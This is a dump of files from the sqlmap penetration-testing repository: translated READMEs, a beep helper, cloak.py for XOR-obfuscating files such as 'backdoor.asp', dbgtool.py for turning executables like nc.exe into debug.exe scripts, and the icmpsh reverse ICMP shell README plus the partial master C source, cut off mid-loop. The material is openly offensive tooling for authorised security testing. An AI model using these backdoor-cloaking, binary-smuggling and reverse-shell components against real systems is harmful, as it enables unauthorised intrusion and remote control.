соединение.\n\nСкриншоты\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nВы можете посетить [набор скриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонстрируемые некоторые функции в wiki.\n\nУстановка\n----\n\nВы можете скачать последнюю версию tarball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или последний zipball, нажав  [сюда](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nПредпочтительно вы можете загрузить sqlmap, клонируя [Git](https://github.com/sqlmapproject/sqlmap) репозиторий:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap работает из коробки с [Python](https://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе.\n\nИспользование\n----\n\nЧтобы получить список основных опций и вариантов выбора, используйте:\n\n    python sqlmap.py -h\n\nЧтобы получить список всех опций и вариантов выбора, используйте:\n\n    python sqlmap.py -hh\n\nВы можете найти пробный запуск [тут](https://asciinema.org/a/46601).\nЧтобы получить обзор возможностей sqlmap, список поддерживаемых функций и описание всех параметров и переключателей, а также примеры, вам рекомендуется ознакомится с [пользовательским мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nСсылки\n----\n\n* Основной сайт: https://sqlmap.org\n* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues\n* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki\n* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Демки: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-tr-TR.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.\n\n\nEkran görüntüleri\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\n\nİsterseniz özelliklerin tanıtımının yapıldığı [ekran görüntüleri](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.\n\n\nKurulum\n----\n\n[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz.\n\nVeya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.\n\nKullanım\n----\n\n\nBütün basit seçeneklerin listesini gösterir\n\n    python sqlmap.py -h\n\nBütün seçenekleri gösterir\n\n    python sqlmap.py -hh\n\nProgram ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası için sqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu  [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz\n\nBağlantılar\n----\n\n* Anasayfa: https://sqlmap.org\n* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues\n* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki\n* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demolar: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-uk-UA.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання.\n\nСкриншоти\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nВи можете ознайомитися з [колекцією скриншотів](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), які демонструють деякі функції в wiki.\n\nВстановлення\n----\n\nВи можете завантажити останню версію tarball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/tarball/master) або останню версію zipball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nНайкраще завантажити sqlmap шляхом клонування [Git](https://github.com/sqlmapproject/sqlmap) репозиторію:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap «працює з коробки» з [Python](https://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі.\n\nВикористання\n----\n\nЩоб отримати список основних опцій і перемикачів, використовуйте:\n\n    python sqlmap.py -h\n\nЩоб отримати список всіх опцій і перемикачів, використовуйте:\n\n    python sqlmap.py -hh\n\nВи можете знайти приклад виконання [тут](https://asciinema.org/a/46601).\nДля того, щоб ознайомитися з можливостями sqlmap, списком підтримуваних функцій та описом всіх параметрів і перемикачів, а також прикладами, вам рекомендується скористатися [інструкцією користувача](https://github.com/sqlmapproject/sqlmap/wiki/Usage).\n\nПосилання\n----\n\n* Основний сайт: https://sqlmap.org\n* Завантаження: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Відстеження проблем: https://github.com/sqlmapproject/sqlmap/issues\n* Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki\n* Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-vi-VN.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng tiêm SQL và tiếp quản các máy chủ cơ sở dữ liệu. Nó đi kèm với \nmột hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện cơ sở dữ liệu, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập tệp của hệ thống và thực hiện các lệnh trên hệ điều hành từ xa.\n\nẢnh chụp màn hình\n----\n\n![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\nBạn có thể truy cập vào [bộ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), chúng trình bày một số tính năng có thể tìm thấy trong wiki.\n\nCài đặt\n----\n\n\nBạn có thể tải xuống tập tin nén tar mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip mới nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master).\n\nTốt hơn là bạn nên tải xuống sqlmap bằng cách clone với [Git](https://github.com/sqlmapproject/sqlmap):\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap hoạt động hiệu quả với [Python](https://www.python.org/download/) phiên bản **2.6**, **2.7** và **3.x** trên bất kì hệ điều hành nào.\n\nSử dụng\n----\n\nĐể có được danh sách các tùy chọn cơ bản, hãy sử dụng:\n\n    python sqlmap.py -h\n\nĐể có được danh sách tất cả các tùy chọn, hãy sử dụng:\n\n    python sqlmap.py -hh\n\nBạn có thể xem video chạy thử [tại đây](https://asciinema.org/a/46601).\nĐể có cái nhìn tổng quan về các khả năng của sqlmap, danh sách các tính năng được hỗ trợ và mô tả về tất cả các tùy chọn, cùng với các ví dụ, bạn nên tham khảo [hướng dẫn sử dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh).\n\nLiên kết\n----\n\n* Trang chủ: https://sqlmap.org\n* Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* Nguồn cấp dữ liệu RSS về commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Theo dõi vấn đề: https://github.com/sqlmapproject/sqlmap/issues\n* Hướng dẫn sử dụng: https://github.com/sqlmapproject/sqlmap/wiki\n* Các câu hỏi thường gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* Ảnh chụp màn hình: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/doc/translations/README-zh-CN.md",
    "content": "# sqlmap ![](https://i.imgur.com/fe85aVR.png)\n\n[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)\n\nsqlmap 是一个开源的渗透测试工具，可以用来自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过带外数据连接的方式执行操作系统命令。\n\n演示截图\n----\n\n![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)\n\n你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示\n\n安装方法\n----\n\n你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.\n\n推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap 可以运行在 [Python](https://www.python.org/download/)  **2.6**, **2.7**  和  **3.x** 版本的任何平台上\n\n使用方法\n----\n\n通过如下命令可以查看基本的用法及命令行参数:\n\n    python sqlmap.py -h\n\n通过如下的命令可以查看所有的用法及命令行参数:\n\n    python sqlmap.py -hh\n\n你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外，你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。\n\n链接\n----\n\n* 项目主页: https://sqlmap.org\n* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)\n* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom\n* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues\n* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki\n* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n* Twitter: [@sqlmap](https://twitter.com/sqlmap)\n* 教程: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)\n* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n"
  },
  {
    "path": "sqlmap/extra/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/extra/beep/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/extra/beep/beep.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nbeep.py - Make a beep sound\n\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport sys\nimport wave\n\nBEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), \"beep.wav\")\n\ndef beep():\n    try:\n        if sys.platform.startswith(\"win\"):\n            _win_wav_play(BEEP_WAV_FILENAME)\n        elif sys.platform.startswith(\"darwin\"):\n            _mac_beep()\n        elif sys.platform.startswith(\"cygwin\"):\n            _cygwin_beep(BEEP_WAV_FILENAME)\n        elif any(sys.platform.startswith(_) for _ in (\"linux\", \"freebsd\")):\n            _linux_wav_play(BEEP_WAV_FILENAME)\n        else:\n            _speaker_beep()\n    except:\n        _speaker_beep()\n\ndef _speaker_beep():\n    sys.stdout.write('\\a')  # doesn't work on modern Linux systems\n\n    try:\n        sys.stdout.flush()\n    except IOError:\n        pass\n\n# Reference: https://lists.gnu.org/archive/html/emacs-devel/2014-09/msg00815.html\ndef _cygwin_beep(filename):\n    os.system(\"play-sound-file '%s' 2>/dev/null\" % filename)\n\ndef _mac_beep():\n    import Carbon.Snd\n    Carbon.Snd.SysBeep(1)\n\ndef _win_wav_play(filename):\n    import winsound\n\n    winsound.PlaySound(filename, winsound.SND_FILENAME)\n\ndef _linux_wav_play(filename):\n    for _ in (\"aplay\", \"paplay\", \"play\"):\n        if not os.system(\"%s '%s' 2>/dev/null\" % (_, filename)):\n            return\n\n    import ctypes\n\n    PA_STREAM_PLAYBACK = 1\n    PA_SAMPLE_S16LE = 3\n    BUFFSIZE = 1024\n\n    class struct_pa_sample_spec(ctypes.Structure):\n        _fields_ = [(\"format\", ctypes.c_int), (\"rate\", ctypes.c_uint32), (\"channels\", ctypes.c_uint8)]\n\n    try:\n        pa = ctypes.cdll.LoadLibrary(\"libpulse-simple.so.0\")\n    except OSError:\n        return\n\n    wave_file = wave.open(filename, \"rb\")\n\n    pa_sample_spec = struct_pa_sample_spec()\n    pa_sample_spec.rate = wave_file.getframerate()\n    pa_sample_spec.channels = wave_file.getnchannels()\n    pa_sample_spec.format = PA_SAMPLE_S16LE\n\n    error = ctypes.c_int(0)\n\n    pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, \"playback\", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))\n    if not pa_stream:\n        raise Exception(\"Could not create pulse audio stream: %s\" % pa.strerror(ctypes.byref(error)))\n\n    while True:\n        latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error))\n        if latency == -1:\n            raise Exception(\"Getting latency failed\")\n\n        buf = wave_file.readframes(BUFFSIZE)\n        if not buf:\n            break\n\n        if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)):\n            raise Exception(\"Could not play file\")\n\n    wave_file.close()\n\n    if pa.pa_simple_drain(pa_stream, ctypes.byref(error)):\n        raise Exception(\"Could not simple drain\")\n\n    pa.pa_simple_free(pa_stream)\n\nif __name__ == \"__main__\":\n    beep()\n"
  },
  {
    "path": "sqlmap/extra/cloak/README.txt",
    "content": "To use cloak.py you need to pass it the original file,\nand optionally the output file name.\n\nExample:\n\n$ python ./cloak.py -i backdoor.asp -o backdoor.asp_\n\nThis will create an encrypted and compressed binary file backdoor.asp_.\n\nSuch file can then be converted to its original form by using the -d\nfunctionality of the cloak.py program:\n\n$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp\n\nIf you skip the output file name, general rule is that the compressed\nfile names are suffixed with the character '_', while the original is\nget by skipping the last character. So, that means that the upper\nexamples can also be written in the following form:\n\n$ python ./cloak.py -i backdoor.asp\n\n$ python ./cloak.py -d -i backdoor.asp_\n"
  },
  {
    "path": "sqlmap/extra/cloak/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/extra/cloak/cloak.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\ncloak.py - Simple file encryption/compression utility\n\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport struct\nimport sys\nimport zlib\n\nfrom optparse import OptionError\nfrom optparse import OptionParser\n\nif sys.version_info >= (3, 0):\n    xrange = range\n    ord = lambda _: _\n\nKEY = b\"ENWsCymUeJcXqSbD\"\n\ndef xor(message, key):\n    return b\"\".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))\n\ndef cloak(inputFile=None, data=None):\n    if data is None:\n        with open(inputFile, \"rb\") as f:\n            data = f.read()\n\n    return xor(zlib.compress(data), KEY)\n\ndef decloak(inputFile=None, data=None):\n    if data is None:\n        with open(inputFile, \"rb\") as f:\n            data = f.read()\n    try:\n        data = zlib.decompress(xor(data, KEY))\n    except Exception as ex:\n        print(ex)\n        print('ERROR: the provided input file \\'%s\\' does not contain valid cloaked content' % inputFile)\n        sys.exit(1)\n    finally:\n        f.close()\n\n    return data\n\ndef main():\n    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]\n    parser = OptionParser(usage=usage, version='0.2')\n\n    try:\n        parser.add_option('-d', dest='decrypt', action=\"store_true\", help='Decrypt')\n        parser.add_option('-i', dest='inputFile', help='Input file')\n        parser.add_option('-o', dest='outputFile', help='Output file')\n\n        (args, _) = parser.parse_args()\n\n        if not args.inputFile:\n            parser.error('Missing the input file, -h for help')\n\n    except (OptionError, TypeError) as ex:\n        parser.error(ex)\n\n    if not os.path.isfile(args.inputFile):\n        print('ERROR: the provided input file \\'%s\\' is non existent' % args.inputFile)\n        sys.exit(1)\n\n    if not args.decrypt:\n        data = cloak(args.inputFile)\n    else:\n        data = decloak(args.inputFile)\n\n    if not args.outputFile:\n        if not args.decrypt:\n            args.outputFile = args.inputFile + '_'\n        else:\n            args.outputFile = args.inputFile[:-1]\n\n    f = open(args.outputFile, 'wb')\n    f.write(data)\n    f.close()\n\nif __name__ == '__main__':\n    main()\n"
  },
  {
    "path": "sqlmap/extra/dbgtool/README.txt",
    "content": "To use dbgtool.py you need to pass it the MS-DOS executable binary file,\nand optionally the output debug.exe script file name.\n\nExample:\n\n$ python ./dbgtool.py -i ./nc.exe -o nc.scr\n\nThis will create a ASCII text file with CRLF line terminators called\nnc.scr.\n\nSuch file can then be converted to its original portable executable with\nthe Windows native debug.exe, that is installed by default in all Windows\nsystems:\n\n> debug.exe < nc.scr\n\nTo be able to execute it on Windows you have to rename it to end with\n'.com' or '.exe':\n\n> ren nc_exe nc.exe\n"
  },
  {
    "path": "sqlmap/extra/dbgtool/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/extra/dbgtool/dbgtool.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\ndbgtool.py - Portable executable to ASCII debug script converter\n\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nfrom optparse import OptionError\nfrom optparse import OptionParser\n\ndef convert(inputFile):\n    fileStat = os.stat(inputFile)\n    fileSize = fileStat.st_size\n\n    if fileSize > 65280:\n        print(\"ERROR: the provided input file '%s' is too big for debug.exe\" % inputFile)\n        sys.exit(1)\n\n    script = \"n %s\\nr cx\\n\" % os.path.basename(inputFile.replace(\".\", \"_\"))\n    script += \"%x\\nf 0100 ffff 00\\n\" % fileSize\n    scrString = \"\"\n    counter = 256\n    counter2 = 0\n\n    fp = open(inputFile, \"rb\")\n    fileContent = fp.read()\n\n    for fileChar in fileContent:\n        unsignedFileChar = fileChar if sys.version_info >= (3, 0) else ord(fileChar)\n\n        if unsignedFileChar != 0:\n            counter2 += 1\n\n            if not scrString:\n                scrString = \"e %0x %02x\" % (counter, unsignedFileChar)\n            else:\n                scrString += \" %02x\" % unsignedFileChar\n        elif scrString:\n            script += \"%s\\n\" % scrString\n            scrString = \"\"\n            counter2 = 0\n\n        counter += 1\n\n        if counter2 == 20:\n            script += \"%s\\n\" % scrString\n            scrString = \"\"\n            counter2 = 0\n\n    script += \"w\\nq\\n\"\n\n    return script\n\ndef main(inputFile, outputFile):\n    if not os.path.isfile(inputFile):\n        print(\"ERROR: the provided input file '%s' is not a regular file\" % inputFile)\n        sys.exit(1)\n\n    script = convert(inputFile)\n\n    if outputFile:\n        fpOut = open(outputFile, \"w\")\n        sys.stdout = fpOut\n        sys.stdout.write(script)\n        sys.stdout.close()\n    else:\n        print(script)\n\nif __name__ == \"__main__\":\n    usage = \"%s -i <input file> [-o <output file>]\" % sys.argv[0]\n    parser = OptionParser(usage=usage, version=\"0.1\")\n\n    try:\n        parser.add_option(\"-i\", dest=\"inputFile\", help=\"Input binary file\")\n\n        parser.add_option(\"-o\", dest=\"outputFile\", help=\"Output debug.exe text file\")\n\n        (args, _) = parser.parse_args()\n\n        if not args.inputFile:\n            parser.error(\"Missing the input file, -h for help\")\n\n    except (OptionError, TypeError) as ex:\n        parser.error(ex)\n\n    inputFile = args.inputFile\n    outputFile = args.outputFile\n\n    main(inputFile, outputFile)\n"
  },
  {
    "path": "sqlmap/extra/icmpsh/README.txt",
    "content": "icmpsh - simple reverse ICMP shell\r\n\r\nicmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl.\r\n\r\n\r\n--- Running the Master ---\r\n\r\nThe master is straight forward to use. There are no extra libraries required for the C version. \r\nThe Perl master however has the following dependencies:\r\n\r\n    * IO::Socket\r\n    * NetPacket::IP\r\n    * NetPacket::ICMP\r\n\r\n\r\nWhen running the master, don't forget to disable ICMP replies by the OS. For example:\r\n\r\n    sysctl -w net.ipv4.icmp_echo_ignore_all=1\r\n\r\nIf you miss doing that, you will receive information from the slave, but the slave is unlikely to receive\r\ncommands send from the master.\r\n\r\n\r\n--- Running the Slave ---\r\n\r\nThe slave comes with a few command line options as outlined below:\r\n\r\n\r\n-t host            host ip address to send ping requests to. This option is mandatory!\r\n\r\n-r                 send a single test icmp request containing the string \"Test1234\" and then quit. \r\n                   This is for testing the connection.\r\n\r\n-d milliseconds    delay between requests in milliseconds \r\n\r\n-o milliseconds    timeout of responses in milliseconds. If a response has not received in time, \r\n                   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.\r\n                   The counter is set back to 0 if a response was received.\r\n\r\n-b num             limit of blanks (unanswered icmp requests before quitting\r\n\r\n-s bytes           maximal data buffer size in bytes\r\n\r\n\r\nIn order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.\r\n"
  },
  {
    "path": "sqlmap/extra/icmpsh/__init__.py",
    "content": "#!/usr/bin/env python\n#\n#  icmpsh - simple icmp command shell (port of icmpsh-m.pl written in\n#  Perl by Nico Leidecker <nico@leidecker.info>)\n#\n#  Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>\n#\n#\n#  This program is free software: you can redistribute it and/or modify\n#  it under the terms of the GNU General Public License as published by\n#  the Free Software Foundation, either version 3 of the License, or\n#  (at your option) any later version.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\npass\n"
  },
  {
    "path": "sqlmap/extra/icmpsh/icmpsh-m.c",
    "content": "/*\r\n *   icmpsh - simple icmp command shell\r\n *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>\r\n *   This program is free software: you can redistribute it and/or modify\r\n *   it under the terms of the GNU General Public License as published by\r\n *   the Free Software Foundation, either version 3 of the License, or\r\n *   (at your option) any later version.\r\n *\r\n *    This program is distributed in the hope that it will be useful,\r\n *    but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\r\n *    GNU General Public License for more details.\r\n *\r\n *    You should have received a copy of the GNU General Public License\r\n *    along with this program.  If not, see <http://www.gnu.org/licenses/>.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <netinet/in.h>\r\n#include <netinet/ip_icmp.h>\r\n#include <netinet/ip.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n\r\n#define IN_BUF_SIZE   1024\r\n#define OUT_BUF_SIZE  64\r\n\r\n// calculate checksum\r\nunsigned short checksum(unsigned short *ptr, int nbytes)\r\n{\r\n    unsigned long sum;\r\n    unsigned short oddbyte, rs;\r\n\r\n    sum = 0;\r\n    while(nbytes > 1) {\r\n        sum += *ptr++;\r\n        nbytes -= 2;\r\n    }\r\n\r\n    if(nbytes == 1) {\r\n        oddbyte = 0;\r\n        *((unsigned char *) &oddbyte) = *(u_char *)ptr;\r\n        sum += oddbyte;\r\n    }\r\n\r\n    sum  = (sum >> 16) + (sum & 0xffff);\r\n    sum += (sum >> 16);\r\n    rs = ~sum;\r\n    return rs;\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n    int sockfd;\r\n    int flags;\r\n    char in_buf[IN_BUF_SIZE];\r\n    char out_buf[OUT_BUF_SIZE];\r\n    unsigned int out_size;\r\n    int nbytes;\r\n    struct iphdr *ip;\r\n    struct icmphdr *icmp;\r\n    char *data;\r\n    struct sockaddr_in addr;\r\n\r\n\r\n    printf(\"icmpsh - master\\n\");\r\n    \r\n    // create raw ICMP socket\r\n    sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);\r\n    if (sockfd == -1) {\r\n       perror(\"socket\");\r\n       return -1;\r\n    }\r\n\r\n    // set stdin to non-blocking\r\n    flags = fcntl(0, F_GETFL, 0);\r\n    flags |= O_NONBLOCK;\r\n    fcntl(0, F_SETFL, flags);\r\n\r\n    printf(\"running...\\n\");\r\n    while(1) {\r\n\r\n        // read data from socket\r\n        